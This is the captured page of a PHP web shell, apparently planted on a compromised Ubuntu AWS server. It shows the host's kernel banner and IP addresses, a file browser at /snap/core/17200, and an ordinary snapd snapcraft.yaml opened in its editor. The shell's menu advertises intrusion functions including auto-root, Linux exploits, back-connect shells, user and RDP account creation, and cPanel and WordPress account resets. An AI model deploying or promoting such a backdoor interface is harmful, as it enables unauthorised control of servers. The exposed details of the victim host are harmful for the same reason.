Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 13.58.73.22
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
17200 /
snap /
[ HOME SHELL ]
Name
Size
Permission
Action
manifest.yaml
79.15
KB
-rw-r--r--
snapcraft.yaml
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : snapcraft.yaml
name: core version: 16-2 version-script: | # remember to keep version script in sync with "Makefile" echo "16-$(grep ^VERSION= prime/usr/lib/snapd/info |cut -f2 -d=| sed s/~ubuntu.*// | cut -b1-29)" summary: snapd runtime environment description: The core runtime environment for snapd confinement: strict type: os grade: stable parts: check: plugin: dump override-pull: | if ! apt-cache policy ubuntu-core-config|grep -Eq 'ppa\.launchpad(content)?\.net/snappy-dev/image'; then echo "The ppa:snappy-dev/image PPA is missing." echo "This probably means that the build was triggered incorrectly." apt-cache policy ubuntu-core-config exit 1 fi hooks: plugin: dump source: hooks organize: configure: meta/hooks/configure livebuild: source: . plugin: make build-packages: - livecd-rootfs - shellcheck - gawk extra-files: source: extra-files plugin: dump # the version in Ubuntu 16.04 (cache v6) fontconfig-xenial: plugin: nil source: https://github.com/snapcore/fc-cache-static-builder.git build: | ./build-from-security.py xenial mkdir -p $SNAPCRAFT_PART_INSTALL/bin cp -a fc-cache-xenial $SNAPCRAFT_PART_INSTALL/bin/fc-cache-v6 stage: - bin/fc-cache-v6 # the version in Ubuntu 18.04 (cache v7) fontconfig-bionic: plugin: nil source: https://github.com/snapcore/fc-cache-static-builder.git build: | ./build-from-security.py bionic mkdir -p $SNAPCRAFT_PART_INSTALL/bin cp -a fc-cache-bionic $SNAPCRAFT_PART_INSTALL/bin/fc-cache-v7 stage: - bin/fc-cache-v7
Close